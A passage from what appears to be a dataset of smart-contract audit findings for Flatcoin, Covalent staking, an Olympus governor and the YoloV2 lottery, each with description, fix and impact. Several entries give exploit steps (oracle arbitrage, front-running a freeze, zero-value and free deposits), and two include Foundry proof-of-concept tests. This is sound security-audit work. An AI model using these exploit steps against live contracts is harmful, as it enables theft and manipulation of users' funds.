_announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n\\n uint32 maxAge 
= _getMaxAge(_executableAtTime);\\n\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n\\n if (_liquidityMinted < _announcedDeposit.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(_liquidityMinted, _announcedDeposit.minAmountOut);\\n\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n\\n if (totalSupply() < MIN_LIQUIDITY) // @audit-info MIN_LIQUIDITY = 10_000\\n revert FlatcoinErrors.AmountTooSmall({amount: totalSupply(), minAmount: MIN_LIQUIDITY});\\n```\\n" +Long traders unable to withdraw their assets,medium,"Whenever the protocol reaches a state where the long trader's profit is larger than LP's stable collateral total, the protocol will be bricked. As a result, the margin deposited and gain of the long traders can no longer be withdrawn and the LPs cannot withdraw their collateral, leading to a loss of assets for the users.\\nPer Line 97 below, if the collateral balance is less than the tracked balance, the `_getCollateralNet` invariant check will revert.\\n```\\nFile: InvariantChecks.sol\\n /// @dev Returns the difference between actual total collateral balance in the vault vs tracked collateral\\n /// Tracked collateral should be updated when depositing to stable LP (stableCollateralTotal) or\\n /// opening leveraged positions (marginDepositedTotal).\\n /// TODO: Account for margin of error due to rounding.\\n function _getCollateralNet(IFlatcoinVault vault) private view returns (uint256 netCollateral) {\\n uint256 collateralBalance = vault.collateral().balanceOf(address(vault));\\n uint256 trackedCollateral = vault.stableCollateralTotal() + vault.getGlobalPositions().marginDepositedTotal;\\n\\n if (collateralBalance < trackedCollateral) revert FlatcoinErrors.InvariantViolation(""collateralNet"");\\n\\n return collateralBalance - trackedCollateral;\\n }\\n```\\n\\nAssume that:\\nBob's long position: Margin = 50 ETH\\nAlice's LP: Deposited = 50 
ETH\\nCollateral Balance = 100 ETH\\nTracked Balance = 100 ETH (Stable Collateral Total = 50 ETH, Margin Deposited Total = 50 ETH)\\nAssume that Bob's long position gains a profit of 51 ETH.\\nThe following actions will trigger the `updateGlobalPositionData` function internally: executeOpen, executeAdjust, executeClose, and liquidation.\\nWhen the `FlatcoinVault.updateGlobalPositionData` function is triggered to update the global position data:\\n```\\nprofitLossTotal = 51 ETH (gain by long)\\n\\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 50 ETH + 0 + 51 ETH = 101 ETH\\n\\n_updateStableCollateralTotal(-51 ETH)\\nnewStableCollateralTotal = stableCollateralTotal + _stableCollateralAdjustment\\nnewStableCollateralTotal = 50 ETH + (-51 ETH) = -1 ETH\\nstableCollateralTotal = (newStableCollateralTotal > 0) ? newStableCollateralTotal : 0;\\nstableCollateralTotal = 0\\n```\\n\\nIn this case, the state becomes as follows:\\nCollateral Balance = 100 ETH\\nTracked Balance = 101 ETH (Stable Collateral Total = 0 ETH, Margin Deposited Total = 101 ETH)\\nNotice that the Collateral Balance and Tracked Balance are no longer in sync. As such, the revert will occur when the `_getCollateralNet` invariant checks are performed.\\nWhenever the protocol reaches a state where the long trader's profit is larger than LP's stable collateral total, this issue will occur, and the protocol will be bricked. The margin deposited and gain of the long traders can no longer be withdrawn from the protocol. The LPs also cannot withdraw their collateral.\\nThe reason is that the `_getCollateralNet` invariant checks are performed in all functions of the protocol that can be accessed by users (listed below):\\nDeposit\\nWithdraw\\nOpen Position\\nAdjust Position\\nClose Position\\nLiquidate","Currently, when the loss of the LP is more than the existing `stableCollateralTotal`, the loss will be capped at zero, and it will not go negative. 
In the above example, the `stableCollateralTotal` is 50, and the loss is 51. Thus, the `stableCollateralTotal` is set to zero instead of -1.\\nThe loss of LP and the gain of the trader should be aligned or symmetric. However, this is not the case in the current implementation. In the above example, the gain of traders is 51, while the loss of LP is 50, which results in a discrepancy here.\\nTo fix the issue, the loss of LP and the gain of the trader should be aligned. For instance, in the above example, if the loss of LP is capped at 50, then the profit of traders must also be capped at 50.\\nFollowing is a high-level logic of the fix:\\n```\\nIf (profitLossTotal > stableCollateralTotal): // (51 > 50) => True\\n profitLossTotal = stableCollateralTotal // profitLossTotal = 50\\n \\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta + profitLossTotal // 50 + 0 + 50 = 100\\n \\nnewStableCollateralTotal = stableCollateralTotal + (-profitLossTotal) // 50 + (-50) = 0\\nstableCollateralTotal = (newStableCollateralTotal > 0) ? newStableCollateralTotal : 0; // stableCollateralTotal = 0\\n```\\n\\nThe comment above verifies that the logic is working as intended.","Loss of assets for the users. 
Since the protocol is bricked due to revert, the long traders are unable to withdraw their deposited margin and gain and the LPs cannot withdraw their collateral.","```\\nFile: InvariantChecks.sol\\n /// @dev Returns the difference between actual total collateral balance in the vault vs tracked collateral\\n /// Tracked collateral should be updated when depositing to stable LP (stableCollateralTotal) or\\n /// opening leveraged positions (marginDepositedTotal).\\n /// TODO: Account for margin of error due to rounding.\\n function _getCollateralNet(IFlatcoinVault vault) private view returns (uint256 netCollateral) {\\n uint256 collateralBalance = vault.collateral().balanceOf(address(vault));\\n uint256 trackedCollateral = vault.stableCollateralTotal() + vault.getGlobalPositions().marginDepositedTotal;\\n\\n if (collateralBalance < trackedCollateral) revert FlatcoinErrors.InvariantViolation(""collateralNet"");\\n\\n return collateralBalance - trackedCollateral;\\n }\\n```\\n" +Oracle can return different prices in same transaction,medium,"The Pyth network oracle contract allows to submit and read two different prices in the same transaction. This can be used to create arbitrage opportunities that can make a profit with no risk at the expense of users on the other side of the trade.\\n`OracleModule.sol` uses Pyth network as the primary source of price feeds. This oracle works in the following way:\\nA dedicated network keeps track of the latest price consensus, together with the timestamp.\\nThis data is queried off-chain and submitted to the on-chain oracle.\\nIt is checked that the data submitted is valid and the new price data is stored.\\nNew requests for the latest price will now return the data submitted until a more recent price is submitted.\\nOne thing to note is that the Pyth network is constantly updating the latest price (every 400ms), so when a new price is submitted on-chain it is not necessary that the price is the latest one. 
Otherwise, the process of querying the data off-chain, building the transaction, and submitting it on-chain would be required to be done with a latency of less than 400ms, which is not feasible. This makes it possible to submit two different prices in the same transaction and, thus, fetch two different prices in the same transaction.\\nThis can be used to create some arbitrage opportunities that can make a profit with no risk.\\nHow this can be exploited\\nAn example of how this can be exploited, and showed in the PoC, would be:\\nCreate a small leverage position.\\nAnnounce an adjustment order to increase the size of the position by some amount.\\nIn the same block, announce a limit close order.\\nAfter the minimum execution time has elapsed, retrieve two prices from the Pyth oracle where the second price is higher than the first one.\\nExecute the adjustment order sending the first price.\\nExecute the limit close order sending the second price.\\nThe result is approximately a profit of\\n```\\nadjustmentSize * (secondPrice - firstPrice) - (adjustmentSize * tradeFees * 2)\\n```\\n\\nNote: For simplicity, we do not take into account the initial size of the position, which in any case can be insignificant compared to the adjustment size. The keeper fee is also not included, as is the owner of the position that is executing the orders.\\nThe following things are required to make a profit out of this attack:\\nSubmit the orders before other keepers. This can be easily achieved, as there are not always enough incentives to execute the orders as soon as possible.\\nObtain a positive delta between two prices in the time frame where the orders are executable that is greater than twice the trade fees. This can be very feasible, especially in moments of high volatility. 
Note also, that this requirement can be lowered to a delta greater than once the trade fees if we take into account that there is currently another vulnerability that allows to avoid paying fees for the limit order.\\nIn the case of not being able to obtain the required delta or observing that a keeper has already submitted a transaction to execute them before the delta is obtained, the user can simply cancel the limit order and will have just the adjustment order executed.\\nAnother possible strategy would pass through the following steps:\\nCreate a leverage position.\\nAnnounce another leverage position with the same size.\\nIn the same block, announce a limit close order.\\nAfter the minimum execution time has elapsed, retrieve two prices from the Pyth oracle where the second price is lower than the first one.\\nExecute the limit close order sending the first price.\\nExecute the open order sending the second price.\\nThe result in this case is having a position with the same size as the original one, but having either lowered the `position.lastPrice` or getting a profit from the original position, depending on how the price has moved since the original position was opened.\\n\\n","```\\nFile: OracleModule.sol\\n FlatcoinStructs.OffchainOracle public offchainOracle; // Offchain Pyth network oracle\\n\\n// Add the line below\\n uint256 public lastOffchainUpdate;\\n\\n (// rest of code)\\n\\n function updatePythPrice(address sender, bytes[] calldata priceUpdateData) external payable nonReentrant {\\n// Add the line below\\n if (lastOffchainUpdate >= block.timestamp) return;\\n// Add the line below\\n lastOffchainUpdate = block.timestamp;\\n// Add the line below\\n\\n // Get fee amount to pay to Pyth\\n uint256 fee = offchainOracle.oracleContract.getUpdateFee(priceUpdateData);\\n```\\n","Different oracle prices can be fetched in the same transaction, which can be used to create arbitrage opportunities that can make a profit with no risk at the expense of users on 
the other side of the trade.",```\\nadjustmentSize * (secondPrice - firstPrice) - (adjustmentSize * tradeFees * 2)\\n```\\n +OperationalStaking may not possess enough CQT for the last withdrawal,medium,"Both `_sharesToTokens` and `_tokensToShares` round down instead of rounding off against the user. This can result in users withdrawing few weis more than they should, which in turn would make the last CQT transfer from the contract revert due to insufficient balance.\\nWhen users `stake`, the shares they will receive is calculated via _tokensToShares:\\n```\\n function _tokensToShares(\\n uint128 amount,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(amount) * DIVIDER) / uint256(rate));\\n }\\n```\\n\\nSo the rounding will be against the user, or zero if the user provided the right amount of CQT.\\nWhen users unstake, their shares are decreased by\\n```\\n function _sharesToTokens(\\n uint128 sharesN,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(sharesN) * uint256(rate)) / DIVIDER);\\n }\\n```\\n\\nSo it is possible to `stake` and `unstake` such amounts, that would leave dust amount of shares on user's balance after their full withdrawal. 
However, dust amounts can not be withdrawn due to the check in _redeemRewards:\\n```\\n require(\\n effectiveAmount >= REWARD_REDEEM_THRESHOLD,\\n ""Requested amount must be higher than redeem threshold""\\n );\\n```\\n\\nBut, if the user does not withdraw immediately, but instead does it after the multiplier is increased, the dust he received from rounding error becomes withdrawable, because his `totalUnlockedValue` becomes greater than `REWARD_REDEEM_THRESHOLD`.\\nSo the user will end up withdrawing more than their `initialStake + shareOfRewards`, which means, if the rounding after all other operations stays net-zero for the protocol, there won't be enough CQT for the last CQT withdrawal (be it `transferUnstakedOut`, `redeemRewards`, or redeemCommission).\\nFoundry PoC","`_sharesToTokens` and `_tokensToShares`, instead of rounding down, should always round off against the user.",Victim's transactions will keep reverting unless they figure out that they need to decrease their withdrawal amount.,"```\\n function _tokensToShares(\\n uint128 amount,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(amount) * DIVIDER) / uint256(rate));\\n }\\n```\\n" +Frontrunning validator freeze to withdraw tokens,medium,"Covalent implements a freeze mechanism to disable malicious Validators, this allows the protocol to block all interactions with a validator when he behaves maliciously. Covalent also implements a timelock to ensure tokens are only withdraw after a certain amount of time. 
After the cooldown ends, tokens can always be withdrawn.\\nFollowing problem arise now: because the tokens can always be withdrawn, a malicious Validator can listen for a potential ""freeze"" transaction in the mempool, front run this transaction to unstake his tokens and withdraw them after the cooldown end.\\nAlmost every action on the Operational Staking contract checks if the validator is frozen or not:\\n```\\n require(!v.frozen, ""Validator is frozen"");\\n```\\n\\nThe methods transferUnstakedOut() and recoverUnstaking() are both not checking for this, making the unstake transaction front runnable. Here are the only checks of transferUnstakedOut():\\n```\\nrequire(validatorId < validatorsN, ""Invalid validator"");\\n require(_validators[validatorId].unstakings[msg.sender].length > unstakingId, ""Unstaking does not exist"");\\n Unstaking storage us = _validators[validatorId].unstakings[msg.sender][unstakingId];\\n require(us.amount >= amount, ""Unstaking has less tokens"");\\n```\\n\\nThis makes following attack possible:\\nValidator cheats and gets rewarded fees.\\nProtocol notices the misbehavior and initiates a Freeze transaction\\nValidator sees the transaction and starts a unstake() transaction with higher gas.\\nValidator gets frozen, but the unstaking is already done\\nValidator waits for cooldown and withdraws tokens.\\nNow the validator has gained unfairly obtained tokens and withdrawn his stake.","Implement a check if validator is frozen on `transferUnstakedOut()` and `recoverUnstaking()`, and revert transaction if true.\\nIf freezing all unstakings is undesirable (e.g. 
not freezing honest unstakes), the sponsor may consider storing the unstake timestamp as well:\\nStore the unstaking block number for each unstake.\\nFreeze the validator from a certain past block only, only unstakings that occur from that block onwards will get frozen.",Malicious validators can front run freeze to withdraw tokens.,"```\\n require(!v.frozen, ""Validator is frozen"");\\n```\\n" +`validatorMaxStake` can be bypassed by using `setValidatorAddress()`,medium,"`setValidatorAddress()` allows a validator to migrate to a new address of their choice. However, the current logic only stacks up the old address' stake to the new one, never checking `validatorMaxStake`.\\nThe current logic for `setValidatorAddress()` is as follow:\\n```\\nfunction setValidatorAddress(uint128 validatorId, address newAddress) external whenNotPaused {\\n // // rest of code\\n v.stakings[newAddress].shares += v.stakings[msg.sender].shares;\\n v.stakings[newAddress].staked += v.stakings[msg.sender].staked;\\n delete v.stakings[msg.sender];\\n // // rest of code\\n}\\n```\\n\\nThe old address' stake is simply stacked on top of the new address' stake. There are no other checks for this amount, even though the new address may already have contained a stake.\\nThen the combined total of the two stakings may exceed `validatorMaxStake`. This accordingly allows the new (validator) staker's amount to bypass said threshold, breaking an important invariant of the protocol.\\nBob the validator has a self-stake equal to `validatorMaxStake`.\\nBob has another address, B2, with some stake delegated to Bob's validator.\\nBob migrates to B2.\\nBob's stake is stacked on top of B2. 
B2 becomes the new validator address, but their stake has exceeded `validatorMaxStake`.\\nB2 can then repeat this procedure to addresses B3, B4, ..., despite B2 already holding more than the max allowed amount.\\nBob now holds more stake than he should be able to, allowing him to earn an unfair amount of rewards compared to other validators.\\nWe also note that, even if the admin tries to freeze Bob, he can front-run the freeze with an unstake, since unstakes are not blocked from withdrawing (after cooldown ends).",Check that the new address's total stake does not exceed `validatorMaxStake` before proceeding with the migration.,"Breaking an important invariant of the protocol.\\nAllowing any validator to bypass the max stake amount. In turn allows them to earn an unfair amount of validator rewards in the process.\\nAllows a validator to unfairly increase their max delegator amount, as an effect of increasing `(validator stake) * maxCapMultiplier`.","```\\nfunction setValidatorAddress(uint128 validatorId, address newAddress) external whenNotPaused {\\n    // // rest of code\\n    v.stakings[newAddress].shares += v.stakings[msg.sender].shares;\\n    v.stakings[newAddress].staked += v.stakings[msg.sender].staked;\\n    delete v.stakings[msg.sender];\\n    // // rest of code\\n}\\n```\\n" +Nobody can cast for any proposal,medium,"```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n    function castVoteInternal(\\n        address voter,\\n        uint256 proposalId,\\n        uint8 support\\n    ) internal returns (uint256) {\\n// rest of code// rest of code\\n        // Get the user's votes at the start of the proposal and at the time of voting. Take the minimum.\\n        uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:->      uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n        uint256 votes = currentVotes > originalVotes ? 
originalVotes : currentVotes;\\n// rest of code// rest of code\\n }\\n```\\n\\n```\\nfunction getPriorVotes(address account, uint256 blockNumber) external view returns (uint256) {\\n-> require(blockNumber < block.number, ""gOHM::getPriorVotes: not yet determined"");\\n// rest of code// rest of code\\n }\\n```\\n\\nTherefore, L446 will always revert. Voting will not be possible.\\nCopy the coded POC below to one project from Foundry and run `forge test -vvv` to prove this issue.","```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:- uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n446:+ uint256 currentVotes = gohm.getPriorVotes(voter, block.number - 1);\\n uint256 votes = currentVotes > originalVotes ? originalVotes : currentVotes;\\n```\\n\\n ",Nobody can cast for any proposal. Not being able to vote means the entire governance contract will be useless. Core functionality is broken.,"```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n function castVoteInternal(\\n address voter,\\n uint256 proposalId,\\n uint8 support\\n ) internal returns (uint256) {\\n// rest of code// rest of code\\n // Get the user's votes at the start of the proposal and at the time of voting. Take the minimum.\\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:-> uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n uint256 votes = currentVotes > originalVotes ? 
originalVotes : currentVotes;\\n// rest of code// rest of code\\n }\\n```\\n" +User can get free entries if the price of any whitelisted ERC20 token is greater than the round's `valuePerEntry`,high,"Lack of explicit separation between ERC20 and ERC721 deposits allows users to gain free entries for any round given there exists a whitelisted ERC20 token with price greater than the round's `valuePerEntry`.\\n```\\n if (isCurrencyAllowed[tokenAddress] != 1) {\\n revert InvalidCollection();\\n }\\n```\\n\\n```\\n if (singleDeposit.tokenType == YoloV2__TokenType.ERC721) {\\n if (price == 0) {\\n price = _getReservoirPrice(singleDeposit);\\n prices[tokenAddress][roundId] = price;\\n }\\n```\\n\\n```\\n uint256 entriesCount = price / round.valuePerEntry;\\n if (entriesCount == 0) {\\n revert InvalidValue();\\n }\\n```\\n\\n```\\n } else if (tokenType == TokenType.ERC721) {\\n for (uint256 j; j < itemIdsLengthForSingleCollection; ) {\\n // rest of code\\n _executeERC721TransferFrom(items[i].tokenAddress, from, to, itemIds[j]);\\n```\\n\\n```\\n function _executeERC721TransferFrom(address collection, address from, address to, uint256 tokenId) internal {\\n // rest of code\\n (bool status, ) = collection.call(abi.encodeCall(IERC721.transferFrom, (from, to, tokenId)));\\n // rest of code\\n }\\n```\\n\\nThe function signature of `transferFrom` for ERC721 and ERC20 is identical, so this will call `transferFrom` on the ERC20 contract with `amount = 0` (since 'token ids' specified in `singleDeposit.tokenIdsOrAmounts` are all 0). Consequently, the user pays nothing and the transaction executes successfully (as long as the ERC20 token does not revert on zero transfers).\\nPaste the test below into `Yolo.deposit.t.sol` with `forge-std/console.sol` imported. It demonstrates a user making 3 free deposits (in the same transaction) using the MKR token (ie. with zero MKR balance). 
The token used can be substituted with any token with price > `valuePerEntry = 0.01 ETH` (which is non-rebasing/non-taxable and has sufficient liquidity in their /ETH Uniswap v3 pool as specified in the README).\\n",Whitelist tokens using both the token address and the token type (ERC20/ERC721).,"Users can get an arbitrary number of entries into rounds for free (which should generally allow them to significantly increase their chances of winning). In the case the winner is a free depositor, they will end up with the same profit as if they participated normally since they have to pay the fee over the total value of the deposits (which includes the price of their free deposits). If the winner is an honest depositor, they still have to pay the full fee including the free entries, but they are unable to claim the value for the free entries (since the `tokenId` (or amount) is zero). They earn less profit than if everyone had participated honestly.",```\\n if (isCurrencyAllowed[tokenAddress] != 1) {\\n revert InvalidCollection();\\n }\\n```\\n +"Users can deposit ""0"" ether to any round",high,"The main invariant to determine the winner is that the indexes must be in ascending order with no repetitions. Therefore, depositing ""0"" is strictly prohibited as it does not increase the index. However, there is a method by which a user can easily deposit ""0"" ether to any round without any extra costs than gas.\\nAs stated in the summary, depositing ""0"" will not increment the entryIndex, leading to a potential issue with the indexes array. This, in turn, may result in an unfair winner selection due to how the upper bound is determined in the array. 
The relevant code snippet illustrating this behavior is found here.\\nLet's check the following code snippet in the `depositETHIntoMultipleRounds` function\\n```\\nfor (uint256 i; i < numberOfRounds; ++i) {\\n uint256 roundId = _unsafeAdd(startingRoundId, i);\\n Round storage round = rounds[roundId];\\n uint256 roundValuePerEntry = round.valuePerEntry;\\n if (roundValuePerEntry == 0) {\\n (, , roundValuePerEntry) = _writeDataToRound({roundId: roundId, roundValue: 0});\\n }\\n\\n _incrementUserDepositCount(roundId, round);\\n\\n // @review depositAmount can be ""0""\\n uint256 depositAmount = amounts[i];\\n\\n // @review 0 % ANY_NUMBER = 0\\n if (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n uint256 entriesCount = _depositETH(round, roundId, roundValuePerEntry, depositAmount);\\n expectedValue += depositAmount;\\n\\n entriesCounts[i] = entriesCount;\\n }\\n\\n // @review will not fail as long as user deposits normally to 1 round\\n // then he can deposit to any round with ""0"" amounts\\n if (expectedValue != msg.value) {\\n revert InvalidValue();\\n }\\n```\\n\\nas we can see in the above comments added by me starting with ""review"" it explains how its possible. As long as user deposits normally to 1 round then he can also deposit ""0"" amounts to any round because the `expectedValue` will be equal to msg.value.\\nTextual PoC: Assume Alice sends the tx with 1 ether as msg.value and ""amounts"" array as [1 ether, 0, 0]. first time the loop starts the 1 ether will be correctly evaluated in to the round. 
When the loop starts the 2nd and 3rd iterations it won't revert because the following code snippet will be ""0"" and adding 0 to `expectedValue` will not increment to `expectedValue` so the msg.value will be exactly same with the `expectedValue`.\\n```\\nif (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n```\\n\\nCoded PoC (copy the test to `Yolo.deposit.sol` file and run the test):\\n```\\nfunction test_deposit0ToRounds() external {\\n vm.deal(user2, 1 ether);\\n vm.deal(user3, 1 ether);\\n\\n // @dev first round starts normally\\n vm.prank(user2);\\n yolo.deposit{value: 1 ether}(1, _emptyDepositsCalldata());\\n\\n // @dev user3 will deposit 1 ether to the current round(1) and will deposit\\n // 0,0 to round 2 and round3\\n uint256[] memory amounts = new uint256[](3);\\n amounts[0] = 1 ether;\\n amounts[1] = 0;\\n amounts[2] = 0;\\n vm.prank(user3);\\n yolo.depositETHIntoMultipleRounds{value: 1 ether}(amounts);\\n\\n // @dev check user3 indeed managed to deposit 0 ether to round2\\n IYoloV2.Deposit[] memory deposits = _getDeposits(2);\\n assertEq(deposits.length, 1);\\n IYoloV2.Deposit memory deposit = deposits[0];\\n assertEq(uint8(deposit.tokenType), uint8(IYoloV2.YoloV2__TokenType.ETH));\\n assertEq(deposit.tokenAddress, address(0));\\n assertEq(deposit.tokenId, 0);\\n assertEq(deposit.tokenAmount, 0);\\n assertEq(deposit.depositor, user3);\\n assertFalse(deposit.withdrawn);\\n assertEq(deposit.currentEntryIndex, 0);\\n\\n // @dev check user3 indeed managed to deposit 0 ether to round3\\n deposits = _getDeposits(3);\\n assertEq(deposits.length, 1);\\n deposit = deposits[0];\\n assertEq(uint8(deposit.tokenType), uint8(IYoloV2.YoloV2__TokenType.ETH));\\n assertEq(deposit.tokenAddress, address(0));\\n assertEq(deposit.tokenId, 0);\\n assertEq(deposit.tokenAmount, 0);\\n assertEq(deposit.depositor, user3);\\n assertFalse(deposit.withdrawn);\\n assertEq(deposit.currentEntryIndex, 0);\\n }\\n```\\n",Add the following check inside the 
depositETHIntoMultipleRounds function\\n```\\nif (depositAmount == 0) {\\n revert InvalidValue();\\n }\\n```\\n,"High, since it will alter the games winner selection and it is very cheap to perform the attack.","```\\nfor (uint256 i; i < numberOfRounds; ++i) {\\n uint256 roundId = _unsafeAdd(startingRoundId, i);\\n Round storage round = rounds[roundId];\\n uint256 roundValuePerEntry = round.valuePerEntry;\\n if (roundValuePerEntry == 0) {\\n (, , roundValuePerEntry) = _writeDataToRound({roundId: roundId, roundValue: 0});\\n }\\n\\n _incrementUserDepositCount(roundId, round);\\n\\n // @review depositAmount can be ""0""\\n uint256 depositAmount = amounts[i];\\n\\n // @review 0 % ANY_NUMBER = 0\\n if (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n uint256 entriesCount = _depositETH(round, roundId, roundValuePerEntry, depositAmount);\\n expectedValue += depositAmount;\\n\\n entriesCounts[i] = entriesCount;\\n }\\n\\n // @review will not fail as long as user deposits normally to 1 round\\n // then he can deposit to any round with ""0"" amounts\\n if (expectedValue != msg.value) {\\n revert InvalidValue();\\n }\\n```\\n" +The number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND,medium,"The number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, because there is no such check in depositETHIntoMultipleRounds() function or rolloverETH() function.\\ndepositETHIntoMultipleRounds() function is called to deposit ETH into multiple rounds, so it's possible that the number of deposits in both current round and next round is MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.\\nWhen current round's number of deposits reaches MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, the round is drawn:\\n```\\n if (\\n _shouldDrawWinner(\\n startingRound.numberOfParticipants,\\n startingRound.maximumNumberOfParticipants,\\n startingRound.deposits.length\\n )\\n ) {\\n _drawWinner(startingRound, startingRoundId);\\n 
}\\n```\\n\\n_drawWinner() function calls VRF provider to get a random number, when the random number is returned by VRF provider, fulfillRandomWords() function is called to chose the winner and the next round will be started:\\n```\\n _startRound({_roundsCount: roundId});\\n```\\n\\nIf the next round's deposit number is also MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, _startRound() function may also draw the next round as well, so it seems that there is no chance the the number of deposits in a round can become larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND:\\n```\\n if (\\n !paused() &&\\n _shouldDrawWinner(numberOfParticipants, round.maximumNumberOfParticipants, round.deposits.length)\\n ) {\\n _drawWinner(round, roundId);\\n }\\n```\\n\\nHowever, _startRound() function will draw the round only if the protocol is not paused. Imagine the following scenario:\\nThe deposit number in `round 1` and `round 2` is MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND;\\n`round 1` is drawn, before random number is sent back by VRF provider, the protocol is paused by the admin for some reason;\\nRandom number is returned and fulfillRandomWords() function is called to start round 2;\\nBecause protocol is paused, `round 2` is set to OPEN but not drawn;\\nLater admin unpauses the protocol, before drawWinner() function can be called, some users may deposit more funds into `round 2` by calling depositETHIntoMultipleRounds() function or rolloverETH() function, this will make the deposit number of `round 2` larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.\\nPlease run the test code to verify:\\n```\\n function test_audit_deposit_more_than_max() public {\\n address alice = makeAddr(""Alice"");\\n address bob = makeAddr(""Bob"");\\n\\n vm.deal(alice, 2 ether);\\n vm.deal(bob, 2 ether);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 0.01 ether;\\n amounts[1] = 0.01 ether;\\n\\n // Users deposit to make the deposit number equals to MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND in both 
rounds\\n        uint256 MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND = 100;\\n        for (uint i; i < MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND / 2; ++i) {\\n            vm.prank(alice);\\n            yolo.depositETHIntoMultipleRounds{value: 0.02 ether}(amounts);\\n\\n            vm.prank(bob);\\n            yolo.depositETHIntoMultipleRounds{value: 0.02 ether}(amounts);\\n        }\\n\\n        // owner pause the protocol before random word returned\\n        vm.prank(owner);\\n        yolo.togglePaused();\\n\\n        // random word returned and round 2 is started but not drawn\\n        vm.prank(VRF_COORDINATOR);\\n        uint256[] memory randomWords = new uint256[](1);\\n        uint256 randomWord = 123;\\n        randomWords[0] = randomWord;\\n        yolo.rawFulfillRandomWords(FULFILL_RANDOM_WORDS_REQUEST_ID, randomWords);\\n\\n        // owner unpause the protocol\\n        vm.prank(owner);\\n        yolo.togglePaused();\\n\\n        // User deposits into round 2\\n        amounts = new uint256[](1);\\n        amounts[0] = 0.01 ether;\\n        vm.prank(bob);\\n        yolo.depositETHIntoMultipleRounds{value: 0.01 ether}(amounts);\\n\\n        (\\n            ,\\n            ,\\n            ,\\n            ,\\n            ,\\n            ,\\n            ,\\n            ,\\n            ,\\n            YoloV2.Deposit[] memory round2Deposits\\n        ) = yolo.getRound(2);\\n\\n        // the number of deposits in round 2 is larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND\\n        assertEq(round2Deposits.length, MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND + 1);\\n    }\\n```\\n","Add check in _depositETH() function which is called by both depositETHIntoMultipleRounds() function and rolloverETH() function to ensure the deposit number cannot be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND:\\n```\\n        uint256 roundDepositCount = round.deposits.length;\\n\\n// Add the line below\\n        if (roundDepositCount >= MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND) {\\n// Add the line below\\n            revert MaximumNumberOfDepositsReached();\\n// Add the line below\\n        }\\n\\n        _validateOnePlayerCannotFillUpTheWholeRound(_unsafeAdd(roundDepositCount, 1), round.numberOfParticipants);\\n```\\n",This issue breaks the invariant that the number of deposits in a round cannot be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.,"```\\n    if 
(\\n _shouldDrawWinner(\\n startingRound.numberOfParticipants,\\n startingRound.maximumNumberOfParticipants,\\n startingRound.deposits.length\\n )\\n ) {\\n _drawWinner(startingRound, startingRoundId);\\n }\\n```\\n" +Low precision is used when checking spot price deviation,medium,"Low precision is used when checking spot price deviation, which might lead to potential manipulation or create the potential for an MEV opportunity due to valuation discrepancy.\\nAssume the following:\\nThe max deviation is set to 1%\\n`nTokenOracleValue` is 1,000,000,000\\n`nTokenSpotValue` is 980,000,001\\n```\\nFile: Constants.sol\\n // Basis for percentages\\n int256 internal constant PERCENTAGE_DECIMALS = 100;\\n```\\n\\n```\\nFile: nTokenCalculations.sol\\n int256 maxValueDeviationPercent = int256(\\n uint256(uint8(nToken.parameters[Constants.MAX_MINT_DEVIATION_LIMIT]))\\n );\\n // Check deviation limit here\\n int256 deviationInPercentage = nTokenOracleValue.sub(nTokenSpotValue).abs()\\n .mul(Constants.PERCENTAGE_DECIMALS).div(nTokenOracleValue);\\n require(deviationInPercentage <= maxValueDeviationPercent, ""Over Deviation Limit"");\\n```\\n\\nBased on the above formula:\\n```\\nnTokenOracleValue.sub(nTokenSpotValue).abs().mul(Constants.PERCENTAGE_DECIMALS).div(nTokenOracleValue);\\n((nTokenOracleValue - nTokenSpotValue) * Constants.PERCENTAGE_DECIMALS) / nTokenOracleValue\\n((1,000,000,000 - 980,000,001) * 100) / 1,000,000,000\\n(19,999,999 * 100) / 1,000,000,000\\n1,999,999,900 / 1,000,000,000 = 1.9999999 = 1\\n```\\n\\nThe above shows that the oracle and spot values have deviated by 1.99999%, which is close to 2%. 
